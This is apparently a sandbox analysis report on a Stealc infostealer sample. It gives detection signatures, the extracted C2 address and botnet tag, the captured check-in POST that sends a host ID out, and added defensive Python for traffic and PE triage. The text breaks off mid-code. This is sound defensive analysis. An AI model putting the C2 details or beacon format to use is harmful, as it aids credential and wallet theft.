
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522427
MD5: dc92ce1751a7abfe2c6232ae8fcdd321
SHA1: dccd40639ea30f104ff1daf9d51f6f8e76efc2ed
SHA256: 16302289d512b8fbc68c2ef8eb4d3bcebdc7f5bf353785390a14d4c5dfbee672
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6780 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DC92CE1751A7ABFE2C6232AE8FCDD321)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6780 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6780 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.6d0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-30T03:24:10.566762+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.6d0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.phpo | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpw | Virustotal: Detection: 16%
Source: http://185.215.113.37/e2b1563c6670f193.phpc | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected (210-byte multipart body decoded from the captured bytes; no User-Agent header is sent):
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AECAECFCAAEBFHIEHDGH
    Host: 185.215.113.37
    Content-Length: 210
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------AECAECFCAAEBFHIEHDGH
    Content-Disposition: form-data; name="hwid"

    A68007A44ABB883884179
    ------AECAECFCAAEBFHIEHDGH
    Content-Disposition: form-data; name="build"

    doma
    ------AECAECFCAAEBFHIEHDGH--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 occurrences; the C2 is contacted by literal IP, so no DNS lookup precedes the connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823830492.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWHjj
Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpot:j
Source: file.exe, 00000000.00000002.1823830492.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw
Source: file.exe, 00000000.00000002.1823830492.0000000000E88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1823830492.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37_
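The check-in captured above is the traffic that ET rule 2044243 alerted on: a POST to the path from the extracted configuration, carrying a multipart body whose only fields are hwid and build, with no User-Agent header. The following Python is an added example, not part of the Joe Sandbox report and not code from the Stealc sample. It reassembles that request from the decoded body and header list printed in the report (the CRLF framing is an assumption, checked against the reported Content-Length of 210), parses the multipart body, and scores the request against that pattern; the benign upload request is constructed here for contrast.

```python
import re

# Reassembled from the report's decoded POST body and header list; the CRLF framing is assumed.
BOUNDARY = b"----AECAECFCAAEBFHIEHDGH"
STEALC_CHECKIN = (
    b"POST /e2b1563c6670f193.php HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + BOUNDARY + b"\r\n"
    b"Host: 185.215.113.37\r\n"
    b"Content-Length: 210\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"A68007A44ABB883884179\r\n"
    b"--" + BOUNDARY + b"\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"doma\r\n"
    b"--" + BOUNDARY + b"--\r\n"
)

# Constructed benign upload for contrast: carries a User-Agent and a different field set.
BENIGN_UPLOAD = (
    b"POST /upload.php HTTP/1.1\r\n"
    b"Host: files.example.test\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Content-Type: multipart/form-data; boundary=xyz\r\n"
    b"Content-Length: 70\r\n"
    b"\r\n"
    b'--xyz\r\nContent-Disposition: form-data; name="file"\r\n\r\nhello\r\n--xyz--\r\n'
)

# Values the sandbox extracted from this sample's configuration (see the report above).
EXTRACTED_C2 = {"host": "185.215.113.37", "path": "/e2b1563c6670f193.php", "build": "doma"}


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.decode().split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.decode().partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Return {field name: value} for a multipart/form-data body."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if not match:
        return {}
    delimiter = b"--" + match.group(1).encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):            # closing delimiter: "--boundary--"
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1).decode()] = part_body.rstrip(b"\r\n").decode(errors="replace")
    return fields


def classify_checkin(raw: bytes) -> dict:
    """Score one request against the first-contact pattern seen in the report:
    POST to a .php path, no User-Agent, multipart body whose only fields are hwid and build."""
    method, path, headers, body = parse_http_request(raw)
    fields = parse_multipart(body, headers.get("content-type", ""))
    indicators = {
        "post_to_php": method == "POST" and path.endswith(".php"),
        "no_user_agent": "user-agent" not in headers,
        "hwid_and_build_only": set(fields) == {"hwid", "build"},
        "content_length_consistent": headers.get("content-length") == str(len(body)),
        "matches_extracted_c2": headers.get("host") == EXTRACTED_C2["host"]
                                 and path == EXTRACTED_C2["path"],
        "build_matches_botnet_tag": fields.get("build") == EXTRACTED_C2["build"],
    }
    # The generic shape decides; the config-specific matches only tie it to this campaign.
    is_checkin = all(indicators[k] for k in ("post_to_php", "no_user_agent", "hwid_and_build_only"))
    return {"method": method, "path": path, "fields": fields,
            "indicators": indicators, "stealc_checkin": is_checkin}


if __name__ == "__main__":
    for label, req in (("sandbox capture", STEALC_CHECKIN), ("benign upload", BENIGN_UPLOAD)):
        result = classify_checkin(req)
        print(f"{label}: stealc_checkin={result['stealc_checkin']} fields={result['fields']}")
```

The build field carries the same value as the "Botnet" entry of the extracted configuration (doma), and hwid is the per-victim identifier. The field-set check is specific to what this sample sent; other Stealc builds may add or rename fields, so use it as a triage heuristic beside the IDS signature rather than instead of it.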

                System Summary

Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Code functions: 0_2_00A3A8E0, 0_2_00A98804, 0_2_00AA29A0, 0_2_00AAC9E2, 0_2_009419F9, 0_2_00A5C12D, 0_2_00A9DA81, 0_2_00A83212, 0_2_00AA7A10, 0_2_00A96CCC, 0_2_00AA9418, 0_2_0097D447, 0_2_00AA4445, 0_2_00A255B1, 0_2_00A9BD9F, 0_2_00A9ADDD, 0_2_00A9F51A, 0_2_009A9690, 0_2_00A12621, 0_2_00AAE675, 0_2_00AE9F94, 0_2_00AAAF02, 0_2_00AA5F45
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006D45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: mljpawsw ZLIB complexity 0.9949790936381265
Source: file.exe, 00000000.00000003.1781255600.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\IA2D82I6.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1872384 > 1048576
Source: file.exe | Static PE information: Raw size of mljpawsw is bigger than: 0x100000 < 0x1a3000

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.6d0000.0.unpack
    unpacked dump: (blank):EW; .rsrc:W; .idata:W; (blank):EW; mljpawsw:EW; uqwudrny:EW; .taggant:EW
    original file: (blank):ER; .rsrc:W; .idata:W; (blank):EW; mljpawsw:EW; uqwudrny:EW; .taggant:EW
    (only the first, unnamed section differs: E+R on disk, E+W in the dump; this rights change is what the "Detected unpacking" signature reports)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ce329 should be: 0x1d4801
Source: file.exe | Static PE information: section names: (blank), .rsrc, .idata, (blank), mljpawsw, uqwudrny, .taggant
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B128B0, at 0_2_00B128CC: push edi; mov dword ptr [esp], 32C15E17h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B5E8BD, at 0_2_00B5E8F1: push 23C5D312h; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B458A2, at 0_2_00B458DC: push 12BD7497h; mov dword ptr [esp], esi
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B96893, at 0_2_00B968CD: push ebx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A3A8E0, at 0_2_00A3A91E: push eax; mov dword ptr [esp], 34431B00h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A3A8E0, at 0_2_00A3A9E4: push 1B2960E2h; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A3A8E0, at 0_2_00A3AA36: push edi; mov dword ptr [esp], esi
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_006EB035, at 0_2_006EB048: push ecx; ret
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A20115: push eax; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A20129: push 385D50E6h; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A2014A: push ebp; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A20152: push 77A457C7h; mov dword ptr [esp], ebp
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A2016D: push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A20183: push eax; mov dword ptr [esp], ebx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A2020E: push ebx; mov dword ptr [esp], 0C929AD6h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A2027D: push 21AC689Ch; mov dword ptr [esp], ebp
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A200CB, at 0_2_00A20297: push ebx; mov dword ptr [esp], 42EC8EB7h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B348C2, at 0_2_00B348ED: push 38DF81A9h; mov dword ptr [esp], ebp
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B348C2, at 0_2_00B34917: push 4AFC60CCh; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00B0D812, at 0_2_00B0D82E: push 471DEB10h; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00AE2809, at 0_2_00AE284D: push edi; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A98886: push 46E2FAFAh; mov dword ptr [esp], edi
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A9888A: push eax; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A988C0: push esi; mov dword ptr [esp], 4E3462E7h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A98900: push 5F312100h; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A98947: push 4BD14633h; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A989CF: push edi; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A989D3: push ecx; mov dword ptr [esp], 10FE7072h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A989E8: push edx; mov dword ptr [esp], 22DF19C8h
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A98AC6: push edi; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function 0_2_00A98804, at 0_2_00A98B12: push 450C76ABh; mov dword ptr [esp], eax
Source: file.exe | Static PE information: section name: mljpawsw entropy: 7.954150449631776
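The static findings in this section (blank and random-looking section names, a section at 7.95 bits/byte of entropy, an entry point in .taggant rather than a standard code section, and a header checksum that does not match the file) can be reproduced without a sandbox. The following Python is an added example, not code from the Joe Sandbox report or from the sample. It walks the PE headers with struct alone (no pefile dependency), recomputes the optional-header CheckSum the way the loader does, and tests itself on a synthetic PE32 that copies the report's section names and E/W rights but whose contents and sizes are made up here; the entropy threshold of 7.0 and the list of standard section names are the example's own choices.

```python
import hashlib, math, struct

STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".idata", ".edata", ".reloc", ".pdata", ".bss", ".tls"}
SCN_EXEC, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 means compressed or encrypted; plain x86 code sits nearer 6."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data))) if n else 0.0

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """imagehlp CheckSum: 32-bit sum skipping the CheckSum dword, folded to 16 bits, plus file length."""
    buf = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(buf), 4):
        if off == checksum_offset & ~3:
            continue
        total += struct.unpack_from("<I", buf, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_pe(data: bytes) -> dict:
    """Minimal PE header walk: machine, entry RVA, stored vs recomputed CheckSum, section table."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt, sections = coff + 20, []
    checksum_off = opt + 64                                   # same offset in PE32 and PE32+
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        sections.append({"name": data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1"),
                         "vaddr": vaddr, "vsize": vsize, "rawsize": rawsize,
                         "chars": struct.unpack_from("<I", data, hdr + 36)[0],
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})
    return {"machine": machine, "entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
            "real_checksum": pe_checksum(data, checksum_off), "sections": sections}

def triage(data: bytes) -> dict:
    """Apply the static checks the report fires on this sample and list the findings."""
    pe, findings = parse_pe(data), []
    for s in pe["sections"]:
        if not s["name"] or not all(0x21 <= ord(c) <= 0x7E for c in s["name"]):
            findings.append(f"section with empty/special-character name: {s['name']!r}")
        elif s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']}")
        if s["rawsize"] and s["entropy"] > 7.0:
            findings.append(f"high-entropy section {s['name']!r}: {s['entropy']:.2f} bits/byte")
        if s["chars"] & SCN_EXEC and s["chars"] & SCN_WRITE:
            findings.append(f"writable+executable section {s['name']!r}")
    ep = next((s for s in pe["sections"]
               if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    ep_name = ep["name"] if ep else None
    if ep_name not in STANDARD_SECTIONS:
        findings.append(f"entry point 0x{pe['entry_rva']:x} outside standard sections (in {ep_name!r})")
    if pe["stored_checksum"] != pe["real_checksum"]:
        findings.append(f"checksum mismatch: header 0x{pe['stored_checksum']:x}, real 0x{pe['real_checksum']:x}")
    return {"pe": pe, "findings": findings}

def build_synthetic_pe(layout, entry_rva: int, checksum: int = 0) -> bytes:
    """Tiny PE32 from (name, rva, body, characteristics) tuples: constructed test input, not sample bytes."""
    nsec = len(layout)
    raw_ptr = (0x40 + 4 + 20 + 224 + 40 * nsec + 0x1FF) & ~0x1FF   # 0x200 file alignment
    dos = bytearray(0x40)
    dos[:2], dos[0x3C:0x40] = b"MZ", struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, 224, 0x0102)  # I386, EXECUTABLE_IMAGE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 64, checksum)
    table, blobs = b"", b""
    for name, rva, body, chars in layout:
        table += struct.pack("<8sIIIIIIHHI", name.encode("latin-1"), len(body), rva, len(body),
                             raw_ptr + len(blobs), 0, 0, 0, 0, chars)
        blobs += body
    return bytes((dos + b"PE\0\0" + coff + opt + table).ljust(raw_ptr, b"\0") + blobs)

def _filler(n: int) -> bytes:   # deterministic high-entropy bytes standing in for packed code
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n // 32))

# Section order, names and E/W rights follow the report's static PE information; sizes are made up.
SAMPLE_LAYOUT = [
    ("",         0x1000, b"\x90" * 0x200, SCN_EXEC | SCN_READ),
    (".rsrc",    0x2000, b"\x00" * 0x200, SCN_READ | SCN_WRITE),
    (".idata",   0x3000, b"\x00" * 0x200, SCN_READ | SCN_WRITE),
    ("",         0x4000, b"\x00" * 0x200, SCN_EXEC | SCN_WRITE),
    ("mljpawsw", 0x5000, _filler(0x1000), SCN_EXEC | SCN_WRITE),
    ("uqwudrny", 0x7000, _filler(0x400),  SCN_EXEC | SCN_WRITE),
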